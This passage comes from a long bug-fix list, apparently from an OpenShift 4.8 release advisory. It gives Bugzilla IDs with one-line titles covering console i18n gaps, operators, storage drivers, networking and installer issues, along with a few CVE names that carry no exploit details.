datapoint" when label cluster="" is set but work when the label is removed or when running directly in Prometheus 1942608 - crictl cannot list the images with an error: error locating item named "manifest" for image with ID 1942614 - Administrator -> Storage - i18n misses 1942641 - Administrator -> Builds - i18n misses 1942673 - Administrator -> Pipelines - i18n misses 1942694 - Resource names with a colon do not display property in the browser window title 1942715 - Administrator -> User Management - i18n misses 1942716 - Quay Container Security operator has Medium <-> Low colors reversed 1942725 - [SCC] openshift-apiserver degraded when creating new pod after installing Stackrox which creates a less privileged SCC [4.8] 1942736 - Administrator -> Administration - i18n misses 1942749 - Install Operator form should use info icon for popovers 1942837 - [OCPv4.6] unable to deploy pod with unsafe sysctls 1942839 - Windows VMs fail to start on air-gapped environments 1942856 - Unable to assign nodes for EgressIP even if the egress-assignable label is set 1942858 - [RFE]Confusing detach volume UX 1942883 - AWS EBS CSI driver does not support partitions 1942894 - IPA error when provisioning masters due to an error from ironic.conductor - /dev/sda is busy 1942935 - must-gather improvements 1943145 - vsphere: client/bootstrap CSR double create 1943175 - unable to install IPI PRIVATE OpenShift cluster in Azure due to organization policies (set azure storage account TLS version default to 1.2) 1943208 - CVE-2021-23362 nodejs-hosted-git-info: Regular Expression denial of service via shortcutMatch in fromUrl() 1943219 - unable to install IPI PRIVATE OpenShift cluster in Azure - SSH access from the Internet should be blocked 1943224 - cannot upgrade openshift-kube-descheduler from 4.7.2 to latest 1943238 - The conditions table does not occupy 100% of the width. 1943258 - [Assisted-4.7][Staging][Advanced Networking] Cluster install fails while waiting for control plane 1943314 - [OVN SCALE] Combine Logical Flows inside Southbound DB. 1943315 - avoid workload disruption for ICSP changes 1943320 - Baremetal node loses connectivity with bonded interface and OVNKubernetes 1943329 - TLSSecurityProfile missing from KubeletConfig CRD Manifest 1943356 - Dynamic plugins surfaced in the UI should be referred to as "Console plugins" 1943539 - crio-wipe is failing to start "Failed to shutdown storage before wiping: A layer is mounted: layer is in use by a container" 1943543 - DeploymentConfig Rollback doesn't reset params correctly 1943558 - [assisted operator] Assisted Service pod unable to reach self signed local registry in disco environement 1943578 - CoreDNS caches NXDOMAIN responses for up to 900 seconds 1943614 - add bracket logging on openshift/builder calls into buildah to assist test-platform team triage 1943637 - upgrade from ocp 4.5 to 4.6 does not clear SNAT rules on ovn 1943649 - don't use hello-openshift for network-check-target 1943667 - KubeDaemonSetRolloutStuck fires during upgrades too often because it does not accurately detect progress 1943719 - storage-operator/vsphere-problem-detector causing upgrades to fail that would have succeeded in past versions 1943804 - API server on AWS takes disruption between 70s and 110s after pod begins termination via external LB 1943845 - Router pods should have startup probes configured 1944121 - OVN-kubernetes references AddressSets after deleting them, causing ovn-controller errors 1944160 - CNO: nbctl daemon should log reconnection info 1944180 - OVN-Kube Master does not release election lock on shutdown 1944246 - Ironic fails to inspect and move node to "manageable' but get bmh remains in "inspecting" 1944268 - openshift-install AWS SDK is missing endpoints for the ap-northeast-3 region 1944509 - Translatable texts without context in ssh expose component 1944581 - oc project not works with cluster proxy 1944587 - VPA could not take actions based on the recommendation when min-replicas=1 1944590 - The field name "VolumeSnapshotContent" is wrong on VolumeSnapshotContent detail page 1944602 - Consistant fallures of features/project-creation.feature Cypress test in CI 1944631 - openshif authenticator should not accept non-hashed tokens 1944655 - [manila-csi-driver-operator] openstack-manila-csi-nodeplugin pods stucked with ".. still connecting to unix:///var/lib/kubelet/plugins/csi-nfsplugin/csi.sock" 1944660 - dm-multipath race condition on bare metal causing /boot partition mount failures 1944674 - Project field become to "All projects" and disabled in "Review and create virtual machine" step in devconsole 1944678 - Whereabouts IPAM CNI duplicate IP addresses assigned to pods 1944761 - field level help instances do not use common util component 1944762 - Drain on worker node during an upgrade fails due to PDB set for image registry pod when only a single replica is present 1944763 - field level help instances do not use common util component 1944853 - Update to nodejs >=14.15.4 for ARM 1944974 - Duplicate KubeControllerManagerDown/KubeSchedulerDown alerts 1944986 - Clarify the ContainerRuntimeConfiguration cr description on the validation 1945027 - Button 'Copy SSH Command' does not work 1945085 - Bring back API data in etcd test 1945091 - In k8s 1.21 bump Feature:IPv6DualStack tests are disabled 1945103 - 'User credentials' shows even the VM is not running 1945104 - In k8s 1.21 bump '[sig-storage] [cis-hostpath] [Testpattern: Generic Ephemeral-volume' tests are disabled 1945146 - Remove pipeline Tech preview badge for pipelines GA operator 1945236 - Bootstrap ignition shim doesn't follow proxy settings 1945261 - Operator dependency not consistently chosen from default channel 1945312 - project deletion does not reset UI project context 1945326 - console-operator: does not check route health periodically 1945387 - Image Registry deployment should have 2 replicas and hard anti-affinity rules 1945398 - 4.8 CI failure: [Serial] [sig-auth][Feature:OAuthServer] [RequestHeaders] [IdP] test RequestHeaders IdP [Suite:openshift/conformance/serial] 1945431 - alerts: SystemMemoryExceedsReservation triggers too quickly 1945443 - operator-lifecycle-manager-packageserver flaps Available=False with no reason or message 1945459 - CVE-2020-28469 nodejs-glob-parent: Regular expression denial of service 1945548 - catalog resource update failed if spec.secrets set to "" 1945584 - Elasticsearch operator fails to install on 4.8 cluster on ppc64le/s390x 1945599 - Optionally set KERNEL_VERSION and RT_KERNEL_VERSION 1945630 - Pod log filename no longer in -.log format 1945637 - QE- Automation- Fixing smoke test suite for pipeline-plugin 1945646 - gcp-routes.sh running as initrc_t unnecessarily 1945659 - [oVirt] remove ovirt_cafile from ovirt-credentials secret 1945677 - Need ACM Managed Cluster Info metric enabled for OCP monitoring telemetry 1945687 - Dockerfile needs updating to new container CI registry 1945700 - Syncing boot mode after changing device should be restricted to Supermicro 1945816 - " Ingresses " should be kept in English for Chinese 1945818 - Chinese translation issues: Operator should be the same with English Operators 1945849 - Unnecessary series churn when a new version of kube-state-metrics is rolled out 1945910 - [aws] support byo iam roles for instances 1945948 - SNO: pods can't reach ingress when the ingress uses a different IPv6. 1946079 - Virtual master is not getting an IP address 1946097 - [oVirt] oVirt credentials secret contains unnecessary "ovirt_cafile" 1946119 - panic parsing install-config 1946243 - No relevant error when pg limit is reached in block pools page 1946307 - [CI] [UPI] use a standardized and reliable way to install google cloud SDK in UPI image 1946320 - Incorrect error message in Deployment Attach Storage Page 1946449 - [e2e][automation] Fix cloud-init tests as UI changed 1946458 - Edit Application action overwrites Deployment envFrom values on save 1946459 - In bare metal IPv6 environment, [sig-storage] [Driver: nfs] tests are failing in CI. 1946479 - In k8s 1.21 bump BoundServiceAccountTokenVolume is disabled by default 1946497 - local-storage-diskmaker pod logs "DeviceSymlinkExists" and "not symlinking, could not get lock: " 1946506 - [on-prem] mDNS plugin no longer needed 1946513 - honor use specified system reserved with auto node sizing 1946540 - auth operator: only configure webhook authenticators for internal auth when oauth-apiserver pods are ready 1946584 - Machine-config controller fails to generate MC, when machine config pool with dashes in name presents under the cluster 1946607 - etcd readinessProbe is not reflective of actual readiness 1946705 - Fix issues with "search" capability in the Topology Quick Add component 1946751 - DAY2 Confusing event when trying to add hosts to a cluster that completed installation 1946788 - Serial tests are broken because of router 1946790 - Marketplace operator flakes Available=False OperatorStarting during updates 1946838 - Copied CSVs show up as adopted components 1946839 - [Azure] While mirroring images to private registry throwing error: invalid character '<' looking for beginning of value 1946865 - no "namespace:kube_pod_container_resource_requests_cpu_cores:sum" and "namespace:kube_pod_container_resource_requests_memory_bytes:sum" metrics 1946893 - the error messages are inconsistent in DNS status conditions if the default service IP is taken 1946922 - Ingress details page doesn't show referenced secret name and link 1946929 - the default dns operator's Progressing status is always True and cluster operator dns Progressing status is False 1947036 - "failed to create Matchbox client or connect" on e2e-metal jobs or metal clusters via cluster-bot 1947066 - machine-config-operator pod crashes when noProxy is * 1947067 - [Installer] Pick up upstream fix for installer console output 1947078 - Incorrect skipped status for conditional tasks in the pipeline run 1947080 - SNO IPv6 with 'temporary 60-day domain' option fails with IPv4 exception 1947154 - [master] [assisted operator] Unable to re-register an SNO instance if deleting CRDs during install 1947164 - Print "Successfully pushed" even if the build push fails. 1947176 - OVN-Kubernetes leaves stale AddressSets around if the deletion was missed. 1947293 - IPv6 provision addresses range larger then /64 prefix (e.g. /48) 1947311 - When adding a new node to localvolumediscovery UI does not show pre-existing node name's 1947360 - [vSphere csi driver operator] operator pod runs as “BestEffort” qosClass 1947371 - [vSphere csi driver operator] operator doesn't create “csidriver” instance 1947402 - Single Node cluster upgrade: AWS EBS CSI driver deployment is stuck on rollout 1947478 - discovery v1 beta1 EndpointSlice is deprecated in Kubernetes 1.21 (OCP 4.8) 1947490 - If Clevis on a managed LUKs volume with Ignition enables, the system will fails to automatically open the LUKs volume on system boot 1947498 - policy v1 beta1 PodDisruptionBudget is deprecated in Kubernetes 1.21 (OCP 4.8) 1947663 - disk details are not synced in web-console 1947665 - Internationalization values for ceph-storage-plugin should be in file named after plugin 1947684 - MCO on SNO sometimes has rendered configs and sometimes does not 1947712 - [OVN] Many faults and Polling interval stuck for 4 seconds every roughly 5 minutes intervals. 1947719 - 8 APIRemovedInNextReleaseInUse info alerts display 1947746 - Show wrong kubernetes version from kube-scheduler/kube-controller-manager operator pods 1947756 - [azure-disk-csi-driver-operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade 1947767 - [azure-disk-csi-driver-operator] Uses the same storage type in the sc created by it as the default sc? 1947771 - [kube-descheduler]descheduler operator pod should not run as “BestEffort” qosClass 1947774 - CSI driver operators use "Always" imagePullPolicy in some containers 1947775 - [vSphere csi driver operator] doesn’t use the downstream images from payload. 1947776 - [vSphere csi driver operator] Should allow more nodes to be updated simultaneously for speeding up cluster upgrade 1947779 - [LSO] Should allow more nodes to be updated simultaneously for speeding up LSO upgrade 1947785 - Cloud Compute: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947789 - Console: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947791 - MCO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947793 - DevEx: APIRemovedInNextReleaseInUse info alerts display 1947794 - OLM: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component does not trigger APIRemovedInNextReleaseInUse alert 1947795 - Networking: APIRemovedInNextReleaseInUse info alerts display 1947797 - CVO: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947798 - Images: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947800 - Ingress: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1947801 - Kube Storage Version Migrator APIRemovedInNextReleaseInUse info alerts display 1947803 - Openshift Apiserver: APIRemovedInNextReleaseInUse info alerts display 1947806 - Re-enable h2spec, http/2 and grpc-interop e2e tests in openshift/origin 1947828 - download it link should save pod log in -.log format 1947866 - disk.csi.azure.com.spec.operatorLogLevel is not updated when CSO loglevel is changed 1947917 - Egress Firewall does not reliably apply firewall rules 1947946 - Operator upgrades can delete existing CSV before completion 1948011 - openshift-controller-manager constantly reporting type "Upgradeable" status Unknown 1948012 - service-ca constantly reporting type "Upgradeable" status Unknown 1948019 - [4.8] Large number of requests to the infrastructure cinder volume service 1948022 - Some on-prem namespaces missing from must-gather 1948040 - cluster-etcd-operator: etcd is using deprecated logger 1948082 - Monitoring should not set Available=False with no reason on updates 1948137 - CNI DEL not called on node reboot - OCP 4 CRI-O. 1948232 - DNS operator performs spurious updates in response to API's defaulting of daemonset's maxSurge and service's ipFamilies and ipFamilyPolicy fields 1948311 - Some jobs failing due to excessive watches: the server has received too many requests and has asked us to try again later 1948359 - [aws] shared tag was not removed from user provided IAM role 1948410 - [LSO] Local Storage Operator uses imagePullPolicy as "Always" 1948415 - [vSphere csi driver operator] clustercsidriver.spec.logLevel doesn't take effective after changing 1948427 - No action is triggered after click 'Continue' button on 'Show community Operator' windows 1948431 - TechPreviewNoUpgrade does not enable CSI migration 1948436 - The outbound traffic was broken intermittently after shutdown one egressIP node 1948443 - OCP 4.8 nightly still showing v1.20 even after 1.21 merge 1948471 - [sig-auth][Feature:OpenShiftAuthorization][Serial] authorization TestAuthorizationResourceAccessReview should succeed [Suite:openshift/conformance/serial] 1948505 - [vSphere csi driver operator] vmware-vsphere-csi-driver-operator pod restart every 10 minutes 1948513 - get-resources.sh doesn't honor the no_proxy settings 1948524 - 'DeploymentUpdated' Updated Deployment.apps/downloads -n openshift-console because it changed message is printed every minute 1948546 - VM of worker is in error state when a network has port_security_enabled=False 1948553 - When setting etcd spec.LogLevel is not propagated to etcd operand 1948555 - A lot of events "rpc error: code = DeadlineExceeded desc = context deadline exceeded" were seen in azure disk csi driver verification test 1948563 - End-to-End Secure boot deployment fails "Invalid value for input variable" 1948582 - Need ability to specify local gateway mode in CNO config 1948585 - Need a CI jobs to test local gateway mode with bare metal 1948592 - [Cluster Network Operator] Missing Egress Router Controller 1948606 - DNS e2e test fails "[sig-arch] Only known images used by tests" because it does not use a known image 1948610 - External Storage [Driver: disk.csi.azure.com] [Testpattern: Dynamic PV (block volmode)] multiVolume [Slow] should access to two volumes with the same volume mode and retain data across pod recreation on the same node [LinuxOnly] 1948626 - TestRouteAdmissionPolicy e2e test is failing often 1948628 - ccoctl needs to plan for future (non-AWS) platform support in the CLI 1948634 - upgrades: allow upgrades without version change 1948640 - [Descheduler] operator log reports key failed with : kubedeschedulers.operator.openshift.io "cluster" not found 1948701 - unneeded CCO alert already covered by CVO 1948703 - p&f: probes should not get 429s 1948705 - [assisted operator] SNO deployment fails - ClusterDeployment shows bootstrap.ign was not found 1948706 - Cluster Autoscaler Operator manifests missing annotation for ibm-cloud-managed profile 1948708 - cluster-dns-operator includes a deployment with node selector of masters for the IBM cloud managed profile 1948711 - thanos querier and prometheus-adapter should have 2 replicas 1948714 - cluster-image-registry-operator targets master nodes in ibm-cloud-managed-profile 1948716 - cluster-ingress-operator deployment targets master nodes for ibm-cloud-managed profile 1948718 - cluster-network-operator deployment manifest for ibm-cloud-managed profile contains master node selector 1948719 - Machine API components should use 1.21 dependencies 1948721 - cluster-storage-operator deployment targets master nodes for ibm-cloud-managed profile 1948725 - operator lifecycle manager does not include profile annotations for ibm-cloud-managed 1948763 - CVE-2021-23368 nodejs-postcss: Regular expression denial of service during source map parsing 1948771 - ~50% of GCP upgrade jobs in 4.8 failing with "AggregatedAPIDown" alert on packages.coreos.com 1948782 - Stale references to the single-node-production-edge cluster profile 1948787 - secret.StringData shouldn't be used for reads 1948788 - Clicking an empty metrics graph (when there is no data) should still open metrics viewer 1948789 - Clicking on a metrics graph should show request and limits queries as well on the resulting metrics page 1948919 - Need minor update in message on channel modal 1948923 - [aws] installer forces the platform.aws.amiID option to be set, while installing a cluster into GovCloud or C2S region 1948926 - Memory Usage of Dashboard 'Kubernetes / Compute Resources / Pod' contain wrong CPU query 1948936 - [e2e][automation][prow] Prow script point to deleted resource 1948943 - (release-4.8) Limit the number of collected pods in the workloads gatherer 1948953 - Uninitialized cloud provider error when provisioning a cinder volume 1948963 - [RFE] Cluster-api-provider-ovirt should handle hugepages 1948966 - Add the ability to run a gather done by IO via a Kubernetes Job 1948981 - Align dependencies and libraries with latest ironic code 1948998 - style fixes by GoLand and golangci-lint 1948999 - Can not assign multiple EgressIPs to a namespace by using automatic way. 1949019 - PersistentVolumes page cannot sync project status automatically which will block user to create PV 1949022 - Openshift 4 has a zombie problem 1949039 - Wrong env name to get podnetinfo for hugepage in app-netutil 1949041 - vsphere: wrong image names in bundle 1949042 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the http2 tests (on OpenStack) 1949050 - Bump k8s to latest 1.21 1949061 - [assisted operator][nmstate] Continuous attempts to reconcile InstallEnv in the case of invalid NMStateConfig 1949063 - [sig-network] Conntrack should be able to preserve UDP traffic when server pod cycles for a NodePort service 1949075 - Extend openshift/api for Add card customization 1949093 - PatternFly v4.96.2 regression results in a.pf-c-button hover issues 1949096 - Restore private git clone tests 1949099 - network-check-target code cleanup 1949105 - NetworkPolicy ... should enforce ingress policy allowing any port traffic to a server on a specific protocol 1949145 - Move openshift-user-critical priority class to CCO 1949155 - Console doesn't correctly check for favorited or last namespace on load if project picker used 1949180 - Pipelines plugin model kinds aren't picked up by parser 1949202 - sriov-network-operator not available from operatorhub on ppc64le 1949218 - ccoctl not included in container image 1949237 - Bump OVN: Lots of conjunction warnings in ovn-controller container logs 1949277 - operator-marketplace: deployment manifests for ibm-cloud-managed profile have master node selectors 1949294 - [assisted operator] OPENSHIFT_VERSIONS in assisted operator subscription does not propagate 1949306 - need a way to see top API accessors 1949313 - Rename vmware-vsphere- images to vsphere- images before 4.8 ships 1949316 - BaremetalHost resource automatedCleaningMode ignored due to outdated vendoring 1949347 - apiserver-watcher support for dual-stack 1949357 - manila-csi-controller pod not running due to secret lack(in another ns) 1949361 - CoreDNS resolution failure for external hostnames with "A: dns: overflow unpacking uint16" 1949364 - Mention scheduling profiles in scheduler operator repository 1949370 - Testability of: Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error 1949384 - Edit Default Pull Secret modal - i18n misses 1949387 - Fix the typo in auto node sizing script 1949404 - label selector on pvc creation page - i18n misses 1949410 - The referred role doesn't exist if create rolebinding from rolebinding tab of role page 1949411 - VolumeSnapshot, VolumeSnapshotClass and VolumeSnapshotConent Details tab is not translated - i18n misses 1949413 - Automatic boot order setting is done incorrectly when using by-path style device names 1949418 - Controller factory workers should always restart on panic() 1949419 - oauth-apiserver logs "[SHOULD NOT HAPPEN] failed to update managedFields for authentication.k8s.io/v1, Kind=TokenReview: failed to convert new object (authentication.k8s.io/v1, Kind=TokenReview)" 1949420 - [azure csi driver operator] pvc.status.capacity and pv.spec.capacity are processed not the same as in-tree plugin 1949435 - ingressclass controller doesn't recreate the openshift-default ingressclass after deleting it 1949480 - Listeners timeout are constantly being updated 1949481 - cluster-samples-operator restarts approximately two times per day and logs too many same messages 1949509 - Kuryr should manage API LB instead of CNO 1949514 - URL is not visible for routes at narrow screen widths 1949554 - Metrics of vSphere CSI driver sidecars are not collected 1949582 - OCP v4.7 installation with OVN-Kubernetes fails with error "egress bandwidth restriction -1 is not equals" 1949589 - APIRemovedInNextEUSReleaseInUse Alert Missing 1949591 - Alert does not catch removed api usage during end-to-end tests. 1949593 - rename DeprecatedAPIInUse alert to APIRemovedInNextReleaseInUse 1949612 - Install with 1.21 Kubelet is spamming logs with failed to get stats failed command 'du' 1949626 - machine-api fails to create AWS client in new regions 1949661 - Kubelet Workloads Management changes for OCPNODE-529 1949664 - Spurious keepalived liveness probe failures 1949671 - System services such as openvswitch are stopped before pod containers on system shutdown or reboot 1949677 - multus is the first pod on a new node and the last to go ready 1949711 - cvo unable to reconcile deletion of openshift-monitoring namespace 1949721 - Pick 99237: Use the audit ID of a request for better correlation 1949741 - Bump golang version of cluster-machine-approver 1949799 - ingresscontroller should deny the setting when spec.tuningOptions.threadCount exceed 64 1949810 - OKD 4.7 unable to access Project Topology View 1949818 - Add e2e test to perform MCO operation Single Node OpenShift 1949820 - Unable to use oc adm top is shortcut when asking for imagestreams 1949862 - The ccoctl tool hits the panic sometime when running the delete subcommand 1949866 - The ccoctl fails to create authentication file when running the command ccoctl aws create-identity-provider with --output-dir parameter 1949880 - adding providerParameters.gcp.clientAccess to existing ingresscontroller doesn't work 1949882 - service-idler build error 1949898 - Backport RP#848 to OCP 4.8 1949907 - Gather summary of PodNetworkConnectivityChecks 1949923 - some defined rootVolumes zones not used on installation 1949928 - Samples Operator updates break CI tests 1949935 - Fix incorrect access review check on start pipeline kebab action 1949956 - kaso: add minreadyseconds to ensure we don't have an LB outage on kas 1949967 - Update Kube dependencies in MCO to 1.21 1949972 - Descheduler metrics: populate build info data and make the metrics entries more readeable 1949978 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should pass the h2spec conformance tests [Suite:openshift/conformance/parallel/minimal] 1949990 - (release-4.8) Extend the OLM operator gatherer to include CSV display name 1949991 - openshift-marketplace pods are crashlooping 1950007 - [CI] [UPI] easy_install is not reliable enough to be used in an image 1950026 - [Descheduler] Need better way to handle evicted pod count for removeDuplicate pod strategy 1950047 - CSV deployment template custom annotations are not propagated to deployments 1950112 - SNO: machine-config pool is degraded: error running chcon -R -t var_run_t /run/mco-machine-os-content/os-content-321709791 1950113 - in-cluster operators need an API for additional AWS tags 1950133 - MCO creates empty conditions on the kubeletconfig object 1950159 - Downstream ovn-kubernetes repo should have no linter errors 1950175 - Update Jenkins and agent base image to Go 1.16 1950196 - ssh Key is added even with 'Expose SSH access to this virtual machine' unchecked 1950210 - VPA CRDs use deprecated API version 1950219 - KnativeServing is not shown in list on global config page 1950232 - [Descheduler] - The minKubeVersion should be 1.21 1950236 - Update OKD imagestreams to prefer centos7 images 1950270 - should use "kubernetes.io/os" in the dns/ingresscontroller node selector description when executing oc explain command 1950284 - Tracking bug for NE-563 - support user-defined tags on AWS load balancers 1950341 - NetworkPolicy: allow-from-router policy does not allow access to service when the endpoint publishing strategy is HostNetwork on OpenshiftSDN network 1950379 - oauth-server is in pending/crashbackoff at beginning 50% of CI runs 1950384 - [sig-builds][Feature:Builds][sig-devex][Feature:Jenkins][Slow] openshift pipeline build perm failing 1950409 - Descheduler operator code and docs still reference v1beta1 1950417 - The Marketplace Operator is building with EOL k8s versions 1950430 - CVO serves metrics over HTTP, despite a lack of consumers 1950460 - RFE: Change Request Size Input to Number Spinner Input 1950471 - e2e-metal-ipi-ovn-dualstack is failing with etcd unable to bootstrap 1950532 - Include "update" when referring to operator approval and channel 1950543 - Document non-HA behaviors in the MCO (SingleNodeOpenshift) 1950590 - CNO: Too many OVN netFlows collectors causes ovnkube pods CrashLoopBackOff 1950653 - BuildConfig ignores Args 1950761 - Monitoring operator deployments anti-affinity rules prevent their rollout on single-node 1950908 - kube_pod_labels metric does not contain k8s labels 1950912 - [e2e][automation] add devconsole tests 1950916 - [RFE]console page show error when vm is poused 1950934 - Unnecessary rollouts can happen due to unsorted endpoints 1950935 - Updating cluster-network-operator builder & base images to be consistent with ART 1950978 - the ingressclass cannot be removed even after deleting the related custom ingresscontroller 1951007 - ovn master pod crashed 1951029 - Drainer panics on missing context for node patch 1951034 - (release-4.8) Split up the GatherClusterOperators into smaller parts 1951042 - Panics every few minutes in kubelet logs post-rebase 1951043 - Start Pipeline Modal Parameters should accept empty string defaults 1951058 - [gcp-pd-csi-driver-operator] topology and multipods capabilities are not enabled in e2e tests 1951066 - [IBM][ROKS] Enable volume snapshot controllers on IBM Cloud 1951084 - avoid benign "Path \"/run/secrets/etc-pki-entitlement\" from \"/etc/containers/mounts.conf\" doesn't exist, skipping" messages 1951158 - Egress Router CRD missing Addresses entry 1951169 - Improve API Explorer discoverability from the Console 1951174 - re-pin libvirt to 6.0.0 1951203 - oc adm catalog mirror can generate ICSPs that exceed etcd's size limit 1951209 - RerunOnFailure runStrategy shows wrong VM status (Starting) on Succeeded VMI 1951212 - User/Group details shows unrelated subjects in role bindings tab 1951214 - VM list page crashes when the volume type is sysprep 1951339 - Cluster-version operator does not manage operand container environments when manifest lacks opinions 1951387 - opm index add doesn't respect deprecated bundles 1951412 - Configmap gatherer can fail incorrectly 1951456 - Docs and linting fixes 1951486 - Replace "kubevirt_vmi_network_traffic_bytes_total" with new metrics names 1951505 - Remove deprecated techPreviewUserWorkload field from CMO's configmap 1951558 - Backport Upstream 101093 for Startup Probe Fix 1951585 - enterprise-pod fails to build 1951636 - assisted service operator use default serviceaccount in operator bundle 1951637 - don't rollout a new kube-apiserver revision on oauth accessTokenInactivityTimeout changes 1951639 - Bootstrap API server unclean shutdown causes reconcile delay 1951646 - Unexpected memory climb while container not in use 1951652 - Add retries to opm index add 1951670 - Error gathering bootstrap log after pivot: The bootstrap machine did not execute the release-image.service systemd unit 1951671 - Excessive writes to ironic Nodes 1951705 - kube-apiserver needs alerts on CPU utlization 1951713 - [OCP-OSP] After changing image in machine object it enters in Failed - Can't find created instance 1951853 - dnses.operator.openshift.io resource's spec.nodePlacement.tolerations godoc incorrectly describes default behavior 1951858 - unexpected text '0' on filter toolbar on RoleBinding tab 1951860 - [4.8] add Intel XXV710 NIC model (1572) support in SR-IOV Operator 1951870 - sriov network resources injector: user defined injection removed existing pod annotations 1951891 - [migration] cannot change ClusterNetwork CIDR during migration 1951952 - [AWS CSI Migration] Metrics for cloudprovider error requests are lost 1952001 - Delegated authentication: reduce the number of watch requests 1952032 - malformatted assets in CMO 1952045 - Mirror nfs-server image used in jenkins-e2e 1952049 - Helm: check (see bug 1947801#c4 steps) audit log to find deprecated API access related to this component to ensure this component won't access APIs that trigger APIRemovedInNextReleaseInUse alert 1952079 - rebase openshift/sdn to kube 1.21 1952111 - Optimize importing from @patternfly/react-tokens 1952174 - DNS operator claims to be done upgrading before it even starts 1952179 - OpenStack Provider Ports UI Underscore Variables 1952187 - Pods stuck in ImagePullBackOff with errors like rpc error: code = Unknown desc = Error committing the finished image: image with ID "SomeLongID" already exists, but uses a different top layer: that ID 1952211 - cascading mounts happening exponentially on when deleting openstack-cinder-csi-driver-node pods 1952214 - Console Devfile Import Dev Preview broken 1952238 - Catalog pods don't report termination logs to catalog-operator 1952262 - Need support external gateway via hybrid overlay 1952266 - etcd operator bumps status.version[name=operator] before operands update 1952268 - etcd operator should not set Degraded=True EtcdMembersDegraded on healthy machine-config node reboots 1952282 - CSR approver races with nodelink controller and does not requeue 1952310 - VM cannot start up if the ssh key is added by another template 1952325 - [e2e][automation] Check support modal in ssh tests and skip template parentSupport 1952333 - openshift/kubernetes vulnerable to CVE-2021-3121 1952358 - Openshift-apiserver CO unavailable in fresh OCP 4.7.5 installations 1952367 - No VM status on overview page when VM is pending 1952368 - worker pool went degraded due to no rpm-ostree on rhel worker during applying new mc 1952372 - VM stop action should not be there if the VM is not running 1952405 - console-operator is not reporting correct Available status 1952448 - Switch from Managed to Disabled mode: no IP removed from configuration and no container metal3-static-ip-manager stopped 1952460 - In k8s 1.21 bump '[sig-network] Firewall rule control plane should not expose well-known ports' test is disabled 1952473 - Monitor pod placement during upgrades 1952487 - Template filter does not work properly 1952495 - “Create” button on the Templates page is confuse 1952527 - [Multus] multi-networkpolicy does wrong filtering 1952545 - Selection issue when inserting YAML snippets 1952585 - Operator links for 'repository' and 'container image' should be clickable in OperatorHub 1952604 - Incorrect port in external loadbalancer config 1952610 - [aws] image-registry panics when the cluster is installed in a new region 1952611 - Tracking bug for OCPCLOUD-1115 - support user-defined tags on AWS EC2 Instances 1952618 - 4.7.4->4.7.8 Upgrade Caused OpenShift-Apiserver Outage 1952625 - Fix translator-reported text issues 1952632 - 4.8 installer should default ClusterVersion channel to stable-4.8 1952635 - Web console displays a blank page- white space instead of cluster information 1952665 - [Multus] multi-networkpolicy pod continue restart due to OOM (out of memory) 1952666 - Implement Enhancement 741 for Kubelet 1952667 - Update Readme for cluster-baremetal-operator with details about the operator 1952684 - cluster-etcd-operator: metrics controller panics on invalid response from client 1952728 - It was not clear for users why Snapshot feature was not available 1952730 - “Customize virtual machine” and the “Advanced” feature are confusing in wizard 1952732 - Users did not understand the boot source labels 1952741 - Monitoring DB: after set Time Range as Custom time range, no data display 1952744 - PrometheusDuplicateTimestamps with user workload monitoring enabled 1952759 - [RFE]It was not immediately clear what the Star icon meant 1952795 - cloud-network-config-controller CRD does not specify correct plural name 1952819 - failed to configure pod interface: error while waiting on flows for pod: timed out waiting for OVS flows 1952820 - [LSO] Delete localvolume pv is failed 1952832 - [IBM][ROKS] Enable the Web console UI to deploy OCS in External mode on IBM Cloud 1952891 - Upgrade failed due to cinder csi driver not deployed 1952904 - Linting issues in gather/clusterconfig package 1952906 - Unit tests for configobserver.go 1952931 - CI does not check leftover PVs 1952958 - Runtime error loading console in Safari 13 1953019 - [Installer][baremetal][metal3] The baremetal IPI installer fails on delete cluster with: failed to clean baremetal bootstrap storage pool 1953035 - Installer should error out if publish: Internal is set while deploying OCP cluster on any on-prem platform 1953041 - openshift-authentication-operator uses 3.9k% of its requested CPU 1953077 - Handling GCP's: Error 400: Permission accesscontextmanager.accessLevels.list is not valid for this resource 1953102 - kubelet CPU use during an e2e run increased 25% after rebase 1953105 - RHCOS system components registered a 3.5x increase in CPU use over an e2e run before and after 4/9 1953169 - endpoint slice controller doesn't handle services target port correctly 1953257 - Multiple EgressIPs per node for one namespace when "oc get hostsubnet" 1953280 - DaemonSet/node-resolver is not recreated by dns operator after deleting it 1953291 - cluster-etcd-operator: peer cert DNS SAN is populated incorrectly 1953418 - [e2e][automation] Fix vm wizard validate tests 1953518 - thanos-ruler pods failed to start up for "cannot unmarshal DNS message" 1953530 - Fix openshift/sdn unit test flake 1953539 - kube-storage-version-migrator: priorityClassName not set 1953543 - (release-4.8) Add missing sample archive data 1953551 - build failure: unexpected trampoline for shared or dynamic linking 1953555 - GlusterFS tests fail on ipv6 clusters 1953647 - prometheus-adapter should have a PodDisruptionBudget in HA topology 1953670 - ironic container image build failing because esp partition size is too small 1953680 - ipBlock ignoring all other cidr's apart from the last one specified 1953691 - Remove unused mock 1953703 - Inconsistent usage of Tech preview badge in OCS plugin of OCP Console 1953726 - Fix issues related to loading dynamic plugins 1953729 - e2e unidling test is flaking heavily on SNO jobs 1953795 - Ironic can't virtual media attach ISOs sourced from ingress routes 1953798 - GCP e2e (parallel and upgrade) regularly trigger KubeAPIErrorBudgetBurn alert, also happens on AWS 1953803 - [AWS] Installer should do pre-check to ensure user-provided private hosted zone name is valid for OCP cluster 1953810 - Allow use of storage policy in VMC environments 1953830 - The oc-compliance build does not available for OCP4.8 